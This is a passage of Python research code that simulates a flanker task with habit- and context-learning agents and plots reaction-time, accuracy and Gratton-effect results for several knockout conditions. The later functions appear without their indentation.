    for tendency in [1]:#[1,10,100,250,1000]:#[1,10,25,50,75,100, 250,1000]:#,3,5,10,30,50,100]: #1,2,3,4,5,6,7,8,9,10,20,30,40,50,60,70,80,90,100]:
        for trans in [90]:#[95,96,97,98,99]
            for unc in [0.2]:#[0,0.1,0.3,0.5,0.7,1,5,10]:#[0.1,1,5,10]:#[0,0.1,0.5,1,2,3,4,5,6,8,10]:
                print(tendency, trans, unc)
                # (previously used switching timeseries and diagnostic plots)
                # Rho[:], contexts, states, state_trans, correct_choice, congruent, num_in_run = \
                #     switching_timeseries(trials, nr=nr, ns=ns, na=na, nc=nc, stable_length=5)
                # plt.figure()
                # plt.plot(Rho[:,2,2])
                # plt.plot(Rho[:,1,1])
                # plt.show()

                # encode non-zero forgetting rates in the file-name prefix
                if pol_lambda>0:
                    prefix = "alpha_"
                else:
                    prefix = ""
                if r_lambda > 0:
                    prefix += "beta_"
                else:
                    prefix += ""

                run_name = "flanker_"+prefix+"h"+str(int(tendency))+"_t"+str(trans)+"_u"+str(unc)+"_f"+str(f)+"_ut"+str(u)+"_contextknockout.json"
                fname = os.path.join(folder, run_name)
                print(fname)

                jsonpickle_numpy.register_handlers()

                # resume from an existing results file if one is present
                if run_name in os.listdir(folder):
                    with open(fname, 'r') as infile:
                        data = json.load(infile)
                    worlds = pickle.decode(data)
                    print(len(worlds))
                    num_w_old = len(worlds)
                else:
                    worlds = []
                    num_w_old = 0

                learn_pol = tendency
                # trans and unc are given in percent; convert to probabilities
                parameters = [learn_pol, trans/100., Rho, utility, unc/100.]

                for i in range(num_w_old, repetitions):
                    # draw a fresh trial sequence for every repetition
                    Rho[:], states, flankers, contexts, state_trans, correct_choice, congruent = \
                        flanker_timeseries(trials, nr=nr, ns=ns, na=na, nc=nc)
                    # nc argument is 1 here (not nc): the context knockout itself
                    worlds.append(run_agent(parameters, trials, T, ns, na, nr, 1,\
                                            f, contexts, states, flankers, \
                                            state_trans=state_trans, \
                                            correct_choice=correct_choice, \
                                            congruent=congruent, \
                                            pol_lambda = pol_lambda,\
                                            r_lambda = r_lambda, learn_habit=False))
                    w = worlds[-1]

                    # print per-repetition summary statistics
                    print("============")
                    print(w.agent.perception.generative_model_rewards[:,:,0])
                    # only one context exists here, so no second reward model
                    #print(w.agent.perception.generative_model_rewards[:,:,1])
                    print("===")
                    print(w.agent.prior_policies[-1])
                    choices = w.actions[:,0]
                    correct = (choices == w.environment.correct_choice).sum()
                    print("percent correct:", correct/trials)
                    correct_cong = (choices[w.environment.congruent==1] == w.environment.correct_choice[w.environment.congruent==1]).sum()
                    print("percent correct congruent:", correct_cong/(w.environment.congruent==1).sum())
                    correct_incong = (choices[w.environment.congruent==0] == w.environment.correct_choice[w.environment.congruent==0]).sum()
                    print("percent correct incongruent:", correct_incong/(w.environment.congruent==0).sum())
                    RTs = w.agent.action_selection.RT[:,0]
                    RT_cong = np.median(RTs[w.environment.congruent==1])
                    RT_incong = np.median(RTs[w.environment.congruent==0])
                    print("congruent RT:", RT_cong)
                    print("incongruent RT:", RT_incong)

                    # (optional diagnostic plots, kept for reference)
                    # plt.figure()
                    # post_pol = np.einsum('tpc,tc->tp', w.agent.posterior_policies[:,0,:,:], w.agent.posterior_context[:,0,:])
                    # like = np.einsum('tpc,tc->tp', w.agent.likelihood[:,0,:,:], w.agent.posterior_context[:,0,:])
                    # plt.plot(post_pol[:,1], '.')
                    # plt.plot(like[:,1], 'x')
                    # plt.ylim([0,1])
                    # plt.show()
                    # plt.figure()
                    # plt.plot(w.agent.action_selection.RT[:,0], '.')
                    # #plt.plot(Rho[:,2,2])
                    # #plt.plot(Rho[:,1,1])
                    # #plt.ylim([ESS*10,2000])
                    # plt.ylim([0,2000])
                    # plt.savefig("Dir_h"+str(int(learn_pol))+"_RT_timecourse"+str(i)+".svg")#"ESS"+str(ESS)+"_h"+str(int(learn_pol))+"_RT_timecourse"+str(i)+".svg")#
                    # plt.show()
                    # plt.figure()
                    # plt.hist(w.agent.action_selection.RT[:,0])
                    # plt.savefig("uncertain_Dir_h"+str(int(learn_pol))+"_RT_hist"+str(i)+"_1000trials.svg")#"ESS"+str(ESS)+"_h"+str(int(learn_pol))+"_RT_hist"+str(i)+".svg")#
                    # plt.show()
                    # plt.figure()
                    # plt.plot(w.agent.posterior_context[:,0,:], 'x')
                    # plt.show()

                # persist all worlds for this parameter combination
                jsonpickle_numpy.register_handlers()
                pickled = pickle.encode(worlds)
                with open(fname, 'w') as outfile:
                    json.dump(pickled, outfile)
                # release references before the next combination to limit memory
                pickled = 0
                worlds = 0
                gc.collect()
def analyze_flanker_simulations(folder):
    """Load saved flanker simulation files, build a tidy DataFrame, and plot.

    Reads every json results file for the parameter grid below from `folder`,
    flattens per-trial measures into parallel arrays, and produces RT/accuracy
    and Gratton-effect plots (some saved to svg in the working directory).

    Returns
    -------
    (pandas.DataFrame, int)
        The assembled per-trial data and the RT bin size used.
    """
    # parameter grid; must match what run_flanker_simulations wrote to disk
    tendencies = [1,10,100, 250]#[1,10,25,50,75,100, 250,1000]#1,10,100,100
    probs = [90,95,99]
    uncertainties = [0,0.1,0.2,0.3,0.5,0.7,1,5,10]#,15,20]

    # load one file first to learn repetitions and trials for array sizing
    run_name = "flanker_alpha_h"+str(int(tendencies[0]))+"_t"+str(probs[0])+"_u"+str(uncertainties[0])+"_f3.5_ut0.99.json"
    fname = os.path.join(folder, run_name)

    jsonpickle_numpy.register_handlers()
    with open(fname, 'r') as infile:
        data = json.load(infile)
    worlds_old = pickle.decode(data)
    print(len(worlds_old))

    repetitions = len(worlds_old)
    trials = worlds_old[0].trials
    num_types = len(tendencies)*len(probs)*len(uncertainties)

    # flat per-trial arrays over all parameter combinations and repetitions
    correct = np.zeros(repetitions*trials*num_types)
    RT = np.zeros(repetitions*trials*num_types)
    agent = np.zeros(repetitions*trials*num_types)
    congruent = np.zeros(repetitions*trials*num_types)
    trial_num = np.zeros(repetitions*trials*num_types)
    epoch = np.zeros(repetitions*trials*num_types)
    tend_arr = np.zeros(repetitions*trials*num_types)
    prob_arr = np.zeros(repetitions*trials*num_types)
    unc_arr = np.zeros(repetitions*trials*num_types)
    binned_RT = np.zeros(repetitions*trials*num_types)
    prev_congruent = np.zeros(repetitions*trials*num_types) - 1  # -1 marks "no previous trial"

    non_dec_time = 100   # non-decision time added to every RT
    bin_size = 250       # RT histogram bin width (in raw selector units)
    t_s = 0.2            # scaling from selector steps to RT units (presumably ms) — TODO confirm
    sim_type = 0         # index of the current parameter combination

    for tendency in tendencies:#,3,5,10,30,50,100]: #1,2,3,4,5,6,7,8,9,10,20,30,40,50,60,70,80,90,100]:
        for trans in probs:#[100,99,98,97,96,95,94]:
            for unc in uncertainties:
                print(tendency, trans, unc)

                run_name = "flanker_alpha_h"+str(int(tendency))+"_t"+str(trans)+"_u"+str(unc)+"_f3.5_ut0.99.json"
                fname = os.path.join(folder, run_name)

                jsonpickle_numpy.register_handlers()
                with open(fname, 'r') as infile:
                    data = json.load(infile)
                worlds_old = pickle.decode(data)

                repetitions = len(worlds_old)
                trials = worlds_old[0].trials
                offset = sim_type*repetitions*trials
                for i in range(repetitions):
                    w = worlds_old[i]
                    correct[offset+i*trials:offset+(i+1)*trials] = (w.actions[:,0] == w.environment.correct_choice).astype(int)
                    RT[offset+i*trials:offset+(i+1)*trials] = t_s*w.agent.action_selection.RT[:,0] + non_dec_time
                    agent[offset+i*trials:offset+(i+1)*trials] = i
                    # NOTE(review): congruent is inverted here (0 = congruent trial)
                    congruent[offset+i*trials:offset+(i+1)*trials] = np.logical_not(w.environment.congruent)
                    trial_num[offset+i*trials:offset+(i+1)*trials] = np.arange(0,trials)
                    # fixed epoch labelling: 10 warm-up trials, then 20/20/20, remainder
                    epoch[offset+i*trials:offset+(i+1)*trials] = [-1]*10 + [0]*20 + [1]*20 + [2]*20 + [3]*(trials-70)
                    tend_arr[offset+i*trials:offset+(i+1)*trials] = tendency
                    prob_arr[offset+i*trials:offset+(i+1)*trials] = trans
                    unc_arr[offset+i*trials:offset+(i+1)*trials] = unc#/100
                    # RT snapped to bin centers, then scaled like RT above
                    binned_RT[offset+i*trials:offset+(i+1)*trials] = t_s*(bin_size//2 + bin_size*(w.agent.action_selection.RT[:,0]//bin_size)) +non_dec_time
                    # previous-trial congruency, shifted by one trial within each run
                    prev_congruent[offset+i*trials:offset+(i+1)*trials][1:] = congruent[offset+i*trials:offset+(i+1)*trials][:-1]
                sim_type+=1

    data_dict = {"correct": correct, "RT": RT, "agent": agent,
                 "congruent": congruent, "binned_RT": binned_RT,
                 "trial_num": trial_num, "epoch": epoch,
                 "uncertainty": unc_arr, "tendencies": tend_arr,
                 "trans_probs": prob_arr, "prev_cong": prev_congruent}

    data = pd.DataFrame(data_dict)

    # plt.figure()
    # for i in range(0,3):
    #     sns.lineplot(x='num_in_run', y='RT', data=data.query('epoch == @i'), style='congruent', label=str(i), ci = 95, estimator=np.nanmean, linewidth=3)
    # plt.show()

    # parameter combination highlighted in the plots below
    tendency=100
    trans=90
    unc=0.2
    cutoff = non_dec_time + 500#5000#2*500

    # RT as a function of context observation uncertainty
    plt.figure()
    plt.title("tendency "+str(tendency)+", trans "+str(trans))
    sns.lineplot(x='uncertainty', y='RT', data=data.query('tendencies==@tendency and trans_probs==@trans and uncertainty<1.1 and binned_RT<=@cutoff'), style='congruent', ci = 95, estimator=np.nanmean, linewidth=3)
    #plt.ylim([200,1000])
    plt.gca().invert_xaxis()
    plt.show()

    # RT as a function of context transition probability
    plt.figure()
    plt.title("tendency "+str(tendency)+", trans "+str(trans))
    sns.lineplot(x='trans_probs', y='RT', data=data.query('tendencies==@tendency and uncertainty==@unc and binned_RT<=@cutoff'), style='congruent', ci = 95, estimator=np.nanmean, linewidth=3)
    #plt.ylim([200,1000])
    #plt.gca().invert_xaxis()
    plt.show()

    # accuracy
    plt.figure()
    #plt.title("tendency "+str(tendency)+", trans "+str(trans)+", unc "+str(unc))
    sns.lineplot(x='binned_RT', y='correct', data=data.query('tendencies==@tendency and trans_probs==@trans and uncertainty==@unc and binned_RT<=@cutoff'), style='congruent', ci = 95, estimator=np.nanmean, linewidth=3)
    #plt.plot([0+bin_size,cutoff-bin_size], [0.5,0.5], '--', color='grey', alpha=0.5)
    plt.ylim([0,1.05])
    plt.yticks(fontsize=16)
    plt.xticks(fontsize=16)
    plt.xlabel("RT", fontsize=16)
    plt.ylabel("Prop correct", fontsize=16)
    plt.savefig("accuracy.svg")
    plt.show()

    plt.figure()
    plt.title("tendency "+str(tendency)+", trans "+str(trans)+", unc "+str(unc))
    sns.lineplot(x='binned_RT', y='correct', data=data.query('tendencies==@tendency and uncertainty==@unc and binned_RT<=@cutoff'), style='congruent', hue='trans_probs', ci = 95, estimator=np.nanmean, linewidth=3)
    #plt.ylim([0,1])
    plt.show()

    plt.figure()
    plt.title("tendency "+str(tendency)+", trans "+str(trans)+", unc "+str(unc))
    sns.lineplot(x='binned_RT', y='correct', data=data.query('tendencies==@tendency and trans_probs==@trans and binned_RT<=@cutoff'), style='congruent', hue='uncertainty', ci = 95, estimator=np.nanmean, linewidth=3)
    #plt.ylim([0,1])
    plt.show()

    # RT distribution
    plt.figure()
    sns.histplot(x='RT', data=data.query('tendencies==@tendency and trans_probs==@trans and uncertainty==@unc and binned_RT<=@cutoff'), hue='congruent', binwidth=t_s*bin_size)
    plt.savefig("RT_histogram.svg")
    plt.show()

    # gratton (sequential congruency) effect
    plt.figure(figsize=(4,5))
    palette = [(0,0,0), (0,0,0)]
    #plt.title("tendency "+str(tendency)+", trans "+str(trans)+", unc "+str(unc))
    sns.lineplot(x='prev_cong', y='RT', data=data.query('tendencies==@tendency and trans_probs==@trans and uncertainty==@unc and trial_num>0'), style='congruent', hue='congruent', ci = 95, estimator=np.nanmean, linewidth=3, markers=True, markersize=12, palette=palette)
    #plt.ylim([200,1000])
    plt.xticks([0,1], labels=["CON", "INC"], fontsize=16)
    plt.yticks(fontsize=16)
    plt.xlim([-0.25,1.25])
    plt.ylim([200,700])
    plt.xlabel("Previous trial type", fontsize=16)
    plt.ylabel("RT", fontsize=16)
    plt.savefig("gratton.svg")
    plt.show()

    plt.figure()
    plt.title("tendency "+str(tendency)+", trans "+str(trans)+", unc "+str(unc))
    sns.lineplot(x='prev_cong', y='RT', data=data.query('tendencies==@tendency and uncertainty==@unc and trial_num>0 and binned_RT<=@cutoff'), style='congruent', hue='trans_probs', ci = 95, estimator=np.nanmean, linewidth=3)
    #plt.ylim([200,1000])
    plt.show()

    plt.figure()
    plt.title("tendency "+str(tendency)+", trans "+str(trans)+", unc "+str(unc))
    sns.lineplot(x='prev_cong', y='RT', data=data.query('tendencies==@tendency and trans_probs==@trans and trial_num>0 and binned_RT<=@cutoff'), style='congruent', hue='uncertainty', ci = 95, estimator=np.nanmean, linewidth=3)
    #plt.ylim([200,1000])
    plt.show()

    # plt.figure()
    # sns.lineplot(x='num_in_run', y='RT', data=data.query('congruent == 1 and trial_num > 50'), ci = 95, estimator=np.nanmedian, linewidth=3)
    # sns.lineplot(x='num_in_run', y='RT', data=data.query('congruent == 0 and trial_num > 50'), ci = 95, estimator=np.nanmedian, linewidth=3)
    # plt.show()

    return data, bin_size
def analyze_flanker_knockout(folder):
tendencies = [1]#[1,10,25,50,75,100, 250,1000]#1,10,100,100
probs = [90]
uncertainties = [0.2]#,15,20]
run_name = "flanker_alpha_h"+str(int(tendencies[0]))+"_t"+str(probs[0])+"_u"+str(uncertainties[0])+"_f3.5_ut0.99_priorknockout.json"
fname = os.path.join(folder, run_name)
jsonpickle_numpy.register_handlers()
with open(fname, 'r') as infile:
data = json.load(infile)
worlds_old = pickle.decode(data)
print(len(worlds_old))
repetitions = len(worlds_old)
trials = worlds_old[0].trials
num_types = len(tendencies)*len(probs)*len(uncertainties)
correct = np.zeros(repetitions*trials*num_types)
RT = np.zeros(repetitions*trials*num_types)
agent = np.zeros(repetitions*trials*num_types)
congruent = np.zeros(repetitions*trials*num_types)
trial_num = np.zeros(repetitions*trials*num_types)
epoch = np.zeros(repetitions*trials*num_types)
tend_arr = np.zeros(repetitions*trials*num_types)
prob_arr = np.zeros(repetitions*trials*num_types)
unc_arr = np.zeros(repetitions*trials*num_types)
binned_RT = np.zeros(repetitions*trials*num_types)
prev_congruent = np.zeros(repetitions*trials*num_types) - 1
non_dec_time = 100
bin_size = 250
t_s = 0.2
sim_type = 0
for tendency in tendencies:#,3,5,10,30,50,100]: #1,2,3,4,5,6,7,8,9,10,20,30,40,50,60,70,80,90,100]:
for trans in probs:#[100,99,98,97,96,95,94]:
for unc in uncertainties:
print(tendency, trans, unc)
run_name = "flanker_alpha_h"+str(int(tendency))+"_t"+str(trans)+"_u"+str(unc)+"_f3.5_ut0.99_priorknockout.json"
fname = os.path.join(folder, run_name)
jsonpickle_numpy.register_handlers()
with open(fname, 'r') as infile:
data = json.load(infile)
worlds_old = pickle.decode(data)
repetitions = len(worlds_old)
trials = worlds_old[0].trials
offset = sim_type*repetitions*trials
for i in range(repetitions):
w = worlds_old[i]
correct[offset+i*trials:offset+(i+1)*trials] = (w.actions[:,0] == w.environment.correct_choice).astype(int)
RT[offset+i*trials:offset+(i+1)*trials] = t_s*w.agent.action_selection.RT[:,0] + non_dec_time
agent[offset+i*trials:offset+(i+1)*trials] = i
congruent[offset+i*trials:offset+(i+1)*trials] = np.logical_not(w.environment.congruent)
trial_num[offset+i*trials:offset+(i+1)*trials] = np.arange(0,trials)
epoch[offset+i*trials:offset+(i+1)*trials] = [-1]*10 + [0]*20 + [1]*20 + [2]*20 + [3]*(trials-70)
tend_arr[offset+i*trials:offset+(i+1)*trials] = tendency
prob_arr[offset+i*trials:offset+(i+1)*trials] = trans
unc_arr[offset+i*trials:offset+(i+1)*trials] = unc#/100
binned_RT[offset+i*trials:offset+(i+1)*trials] = t_s*(bin_size//2 + bin_size*(w.agent.action_selection.RT[:,0]//bin_size)) +non_dec_time
prev_congruent[offset+i*trials:offset+(i+1)*trials][1:] = congruent[offset+i*trials:offset+(i+1)*trials][:-1]
sim_type+=1
# Collect all per-trial measures into a long-format DataFrame
# (one row per trial per agent per simulation condition).
data_dict = {"correct": correct, "RT": RT, "agent": agent,
"congruent": congruent, "binned_RT": binned_RT,
"trial_num": trial_num, "epoch": epoch,
"uncertainty": unc_arr, "tendencies": tend_arr,
"trans_probs": prob_arr, "prev_cong": prev_congruent}
data = pd.DataFrame(data_dict)
# plt.figure()
# for i in range(0,3):
# sns.lineplot(x='num_in_run', y='RT', data=data.query('epoch == @i'), style='congruent', label=str(i), ci = 95, estimator=np.nanmean, linewidth=3)
# plt.show()
# Parameter condition selected for the prior-knockout plots below.
tendency=1
trans=90
unc=0.2
# Upper RT limit for the accuracy plot. NOTE(review): 800 here, while the
# learning-/context-knockout sections below use 500 -- presumably
# intentional, confirm.
cutoff = non_dec_time + 800#non_dec_time + 500#5000#2*500
# accuracy
# Conditional accuracy function: proportion correct per binned RT,
# split by congruency, for the prior-knockout simulations.
plt.figure()
#plt.title("tendency "+str(tendency)+", trans "+str(trans)+", unc "+str(unc))
plt.title("priorknockout")
sns.lineplot(x='binned_RT', y='correct', data=data.query('tendencies==@tendency and trans_probs==@trans and uncertainty==@unc and binned_RT<=@cutoff'), style='congruent', ci = 95, estimator=np.nanmean, linewidth=3)
#plt.plot([0+bin_size,cutoff-bin_size], [0.5,0.5], '--', color='grey', alpha=0.5)
#plt.ylim([0,1.05])
plt.yticks(fontsize=16)
plt.xticks(fontsize=16)
plt.xlabel("RT", fontsize=16)
plt.ylabel("Prop correct", fontsize=16)
plt.savefig("accuracy_priorknockout.svg")
plt.show()
# gratton
# Gratton plot: mean RT by previous-trial congruency (x) and current
# congruency (style/hue); first trials (trial_num==0) are excluded
# because they have no predecessor.
plt.figure(figsize=(4,5))
palette = [(0,0,0), (0,0,0)]
#plt.title("tendency "+str(tendency)+", trans "+str(100trans)+", unc "+str(unc))
plt.title("priorknockout")
sns.lineplot(x='prev_cong', y='RT', data=data.query('tendencies==@tendency and trans_probs==@trans and uncertainty==@unc and trial_num>0'), style='congruent', hue='congruent', ci = 95, estimator=np.nanmean, linewidth=3, markers=True, markersize=12, palette=palette)
#plt.ylim([200,1000])
plt.xticks([0,1], labels=["CON", "INC"], fontsize=16)
plt.yticks(fontsize=16)
plt.xlim([-0.25,1.25])
plt.ylim([0,800])
plt.xlabel("Previous trial type", fontsize=16)
plt.ylabel("RT", fontsize=16)
plt.savefig("gratton_priorknockout.svg")
plt.show()
# ---- learning-knockout analysis: load simulation results ----
# Parameter grids (single values here; the commented lists show the
# full grids that were used at some point).
tendencies = [100]#[1,10,25,50,75,100, 250,1000]#1,10,100,100
probs = [90]
uncertainties = [0.2]#,15,20]
run_name = "flanker_alpha_h"+str(int(tendencies[0]))+"_t"+str(probs[0])+"_u"+str(uncertainties[0])+"_f3.5_ut0.99_learningknockout.json"
fname = os.path.join(folder, run_name)
jsonpickle_numpy.register_handlers()
# Load one run first just to discover the number of repetitions and
# trials, so the flat result arrays can be sized up front.
# NOTE(review): `pickle` here is presumably the jsonpickle module under
# an alias -- confirm at the file's imports.
with open(fname, 'r') as infile:
data = json.load(infile)
worlds_old = pickle.decode(data)
print(len(worlds_old))
repetitions = len(worlds_old)
trials = worlds_old[0].trials
num_types = len(tendencies)*len(probs)*len(uncertainties)
# Flat arrays, one entry per (condition, repetition, trial).
correct = np.zeros(repetitions*trials*num_types)
RT = np.zeros(repetitions*trials*num_types)
agent = np.zeros(repetitions*trials*num_types)
congruent = np.zeros(repetitions*trials*num_types)
trial_num = np.zeros(repetitions*trials*num_types)
epoch = np.zeros(repetitions*trials*num_types)
tend_arr = np.zeros(repetitions*trials*num_types)
prob_arr = np.zeros(repetitions*trials*num_types)
unc_arr = np.zeros(repetitions*trials*num_types)
binned_RT = np.zeros(repetitions*trials*num_types)
# -1 marks "no previous trial" for the first trial of each agent.
prev_congruent = np.zeros(repetitions*trials*num_types) - 1
non_dec_time = 100
bin_size = 250
t_s = 0.2
sim_type = 0
# Iterate over the condition grid and fill the flat arrays per agent.
for tendency in tendencies:#,3,5,10,30,50,100]: #1,2,3,4,5,6,7,8,9,10,20,30,40,50,60,70,80,90,100]:
for trans in probs:#[100,99,98,97,96,95,94]:
for unc in uncertainties:
print(tendency, trans, unc)
run_name = "flanker_alpha_h"+str(int(tendency))+"_t"+str(trans)+"_u"+str(unc)+"_f3.5_ut0.99_learningknockout.json"
fname = os.path.join(folder, run_name)
jsonpickle_numpy.register_handlers()
with open(fname, 'r') as infile:
data = json.load(infile)
worlds_old = pickle.decode(data)
repetitions = len(worlds_old)
trials = worlds_old[0].trials
# Start index of this condition's slice in the flat arrays.
offset = sim_type*repetitions*trials
for i in range(repetitions):
w = worlds_old[i]
# Correctness: chosen action vs. the environment's correct choice.
correct[offset+i*trials:offset+(i+1)*trials] = (w.actions[:,0] == w.environment.correct_choice).astype(int)
RT[offset+i*trials:offset+(i+1)*trials] = t_s*w.agent.action_selection.RT[:,0] + non_dec_time
agent[offset+i*trials:offset+(i+1)*trials] = i
# Note the inversion: congruent==1 encodes INcongruent trials here.
congruent[offset+i*trials:offset+(i+1)*trials] = np.logical_not(w.environment.congruent)
trial_num[offset+i*trials:offset+(i+1)*trials] = np.arange(0,trials)
# Epoch labels: 10 warm-up trials (-1), then blocks of 20 (0,1,2), rest 3.
epoch[offset+i*trials:offset+(i+1)*trials] = [-1]*10 + [0]*20 + [1]*20 + [2]*20 + [3]*(trials-70)
tend_arr[offset+i*trials:offset+(i+1)*trials] = tendency
prob_arr[offset+i*trials:offset+(i+1)*trials] = trans
unc_arr[offset+i*trials:offset+(i+1)*trials] = unc#/100
# Bin RTs (bin centre), scale by t_s, add non-decision time.
binned_RT[offset+i*trials:offset+(i+1)*trials] = t_s*(bin_size//2 + bin_size*(w.agent.action_selection.RT[:,0]//bin_size)) +non_dec_time
# Previous-trial congruency (first trial keeps -1).
prev_congruent[offset+i*trials:offset+(i+1)*trials][1:] = congruent[offset+i*trials:offset+(i+1)*trials][:-1]
sim_type+=1
# Collect all per-trial measures into a long-format DataFrame
# (one row per trial per agent per simulation condition).
data_dict = {"correct": correct, "RT": RT, "agent": agent,
"congruent": congruent, "binned_RT": binned_RT,
"trial_num": trial_num, "epoch": epoch,
"uncertainty": unc_arr, "tendencies": tend_arr,
"trans_probs": prob_arr, "prev_cong": prev_congruent}
data = pd.DataFrame(data_dict)
# plt.figure()
# for i in range(0,3):
# sns.lineplot(x='num_in_run', y='RT', data=data.query('epoch == @i'), style='congruent', label=str(i), ci = 95, estimator=np.nanmean, linewidth=3)
# plt.show()
# Parameter condition selected for the learning-knockout plots below.
tendency=100
trans=90
unc=0.2
# Upper RT limit for the accuracy plot.
cutoff = non_dec_time + 500#5000#2*500
# accuracy
# Conditional accuracy function: proportion correct per binned RT,
# split by congruency, for the learning-knockout simulations.
plt.figure()
#plt.title("tendency "+str(tendency)+", trans "+str(trans)+", unc "+str(unc))
plt.title("learningknockout")
sns.lineplot(x='binned_RT', y='correct', data=data.query('tendencies==@tendency and trans_probs==@trans and uncertainty==@unc and binned_RT<=@cutoff'), style='congruent', ci = 95, estimator=np.nanmean, linewidth=3)
#plt.plot([0+bin_size,cutoff-bin_size], [0.5,0.5], '--', color='grey', alpha=0.5)
#plt.ylim([0,1.05])
plt.yticks(fontsize=16)
plt.xticks(fontsize=16)
plt.xlabel("RT", fontsize=16)
plt.ylabel("Prop correct", fontsize=16)
plt.savefig("accuracy_learningknockout.svg")
plt.show()
# gratton
# Gratton plot: mean RT by previous-trial congruency, excluding each
# agent's first trial (no predecessor).
plt.figure(figsize=(4,5))
palette = [(0,0,0), (0,0,0)]
#plt.title("tendency "+str(tendency)+", trans "+str(100trans)+", unc "+str(unc))
plt.title("learningknockout")
sns.lineplot(x='prev_cong', y='RT', data=data.query('tendencies==@tendency and trans_probs==@trans and uncertainty==@unc and trial_num>0'), style='congruent', hue='congruent', ci = 95, estimator=np.nanmean, linewidth=3, markers=True, markersize=12, palette=palette)
#plt.ylim([200,1000])
plt.xticks([0,1], labels=["CON", "INC"], fontsize=16)
plt.yticks(fontsize=16)
plt.xlim([-0.25,1.25])
plt.ylim([0,800])
plt.xlabel("Previous trial type", fontsize=16)
plt.ylabel("RT", fontsize=16)
plt.savefig("gratton_learningknockout.svg")
plt.show()
# ---- context-knockout analysis: load simulation results ----
# Same structure as the learning-knockout section above, but reading the
# "_contextknockout" result files and tendency 1.
tendencies = [1]#[1,10,25,50,75,100, 250,1000]#1,10,100,100
probs = [90]
uncertainties = [0.2]#,15,20]
run_name = "flanker_alpha_h"+str(int(tendencies[0]))+"_t"+str(probs[0])+"_u"+str(uncertainties[0])+"_f3.5_ut0.99_contextknockout.json"
fname = os.path.join(folder, run_name)
jsonpickle_numpy.register_handlers()
# Load one run to size the flat result arrays.
with open(fname, 'r') as infile:
data = json.load(infile)
worlds_old = pickle.decode(data)
print(len(worlds_old))
repetitions = len(worlds_old)
trials = worlds_old[0].trials
num_types = len(tendencies)*len(probs)*len(uncertainties)
# Flat arrays, one entry per (condition, repetition, trial).
correct = np.zeros(repetitions*trials*num_types)
RT = np.zeros(repetitions*trials*num_types)
agent = np.zeros(repetitions*trials*num_types)
congruent = np.zeros(repetitions*trials*num_types)
trial_num = np.zeros(repetitions*trials*num_types)
epoch = np.zeros(repetitions*trials*num_types)
tend_arr = np.zeros(repetitions*trials*num_types)
prob_arr = np.zeros(repetitions*trials*num_types)
unc_arr = np.zeros(repetitions*trials*num_types)
binned_RT = np.zeros(repetitions*trials*num_types)
# -1 marks "no previous trial" for each agent's first trial.
prev_congruent = np.zeros(repetitions*trials*num_types) - 1
non_dec_time = 100
bin_size = 250
t_s = 0.2
sim_type = 0
# Iterate over the condition grid and fill the flat arrays per agent.
for tendency in tendencies:#,3,5,10,30,50,100]: #1,2,3,4,5,6,7,8,9,10,20,30,40,50,60,70,80,90,100]:
for trans in probs:#[100,99,98,97,96,95,94]:
for unc in uncertainties:
print(tendency, trans, unc)
run_name = "flanker_alpha_h"+str(int(tendency))+"_t"+str(trans)+"_u"+str(unc)+"_f3.5_ut0.99_contextknockout.json"
fname = os.path.join(folder, run_name)
jsonpickle_numpy.register_handlers()
with open(fname, 'r') as infile:
data = json.load(infile)
worlds_old = pickle.decode(data)
repetitions = len(worlds_old)
trials = worlds_old[0].trials
offset = sim_type*repetitions*trials
for i in range(repetitions):
w = worlds_old[i]
correct[offset+i*trials:offset+(i+1)*trials] = (w.actions[:,0] == w.environment.correct_choice).astype(int)
RT[offset+i*trials:offset+(i+1)*trials] = t_s*w.agent.action_selection.RT[:,0] + non_dec_time
agent[offset+i*trials:offset+(i+1)*trials] = i
# Inverted: congruent==1 encodes INcongruent trials.
congruent[offset+i*trials:offset+(i+1)*trials] = np.logical_not(w.environment.congruent)
trial_num[offset+i*trials:offset+(i+1)*trials] = np.arange(0,trials)
# Epochs: 10 warm-up trials (-1), blocks of 20 (0,1,2), remainder 3.
epoch[offset+i*trials:offset+(i+1)*trials] = [-1]*10 + [0]*20 + [1]*20 + [2]*20 + [3]*(trials-70)
tend_arr[offset+i*trials:offset+(i+1)*trials] = tendency
prob_arr[offset+i*trials:offset+(i+1)*trials] = trans
unc_arr[offset+i*trials:offset+(i+1)*trials] = unc#/100
# Bin RTs (bin centre), scale by t_s, add non-decision time.
binned_RT[offset+i*trials:offset+(i+1)*trials] = t_s*(bin_size//2 + bin_size*(w.agent.action_selection.RT[:,0]//bin_size)) +non_dec_time
# Previous-trial congruency (first trial keeps -1).
prev_congruent[offset+i*trials:offset+(i+1)*trials][1:] = congruent[offset+i*trials:offset+(i+1)*trials][:-1]
sim_type+=1
# Collect all per-trial measures into a long-format DataFrame.
data_dict = {"correct": correct, "RT": RT, "agent": agent,
"congruent": congruent, "binned_RT": binned_RT,
"trial_num": trial_num, "epoch": epoch,
"uncertainty": unc_arr, "tendencies": tend_arr,
"trans_probs": prob_arr, "prev_cong": prev_congruent}
data = pd.DataFrame(data_dict)
# plt.figure()
# for i in range(0,3):
# sns.lineplot(x='num_in_run', y='RT', data=data.query('epoch == @i'), style='congruent', label=str(i), ci = 95, estimator=np.nanmean, linewidth=3)
# plt.show()
# Parameter condition selected for the context-knockout plots below.
tendency=1
trans=90
unc=0.2
# Upper RT limit for the accuracy plot.
cutoff = non_dec_time + 500#5000#2*500
# accuracy
# Conditional accuracy function: proportion correct per binned RT,
# split by congruency, for the context-knockout simulations.
plt.figure()
#plt.title("tendency "+str(tendency)+", trans "+str(trans)+", unc "+str(unc))
plt.title("contextknockout")
sns.lineplot(x='binned_RT', y='correct', data=data.query('tendencies==@tendency and trans_probs==@trans and uncertainty==@unc and binned_RT<=@cutoff'), style='congruent', ci = 95, estimator=np.nanmean, linewidth=3)
#plt.plot([0+bin_size,cutoff-bin_size], [0.5,0.5], '--', color='grey', alpha=0.5)
#plt.ylim([0,1.05])
plt.yticks(fontsize=16)
plt.xticks(fontsize=16)
plt.xlabel("RT", fontsize=16)
plt.ylabel("Prop correct", fontsize=16)
plt.savefig("accuracy_contextknockout.svg")
plt.show()
# gratton
# Gratton plot: mean RT by previous-trial congruency, excluding each
# agent's first trial (no predecessor).
plt.figure(figsize=(4,5))
palette = [(0,0,0), (0,0,0)]
#plt.title("tendency "+str(tendency)+", trans "+str(100trans)+", unc "+str(unc))
plt.title("contextknockout")
sns.lineplot(x='prev_cong', y='RT', data=data.query('tendencies==@tendency and trans_probs==@trans and uncertainty==@unc and trial_num>0'), style='congruent', hue='congruent', ci = 95, estimator=np.nanmean, linewidth=3, markers=True, markersize=12, palette=palette)
#plt.ylim([200,1000])
plt.xticks([0,1], labels=["CON", "INC"], fontsize=16)
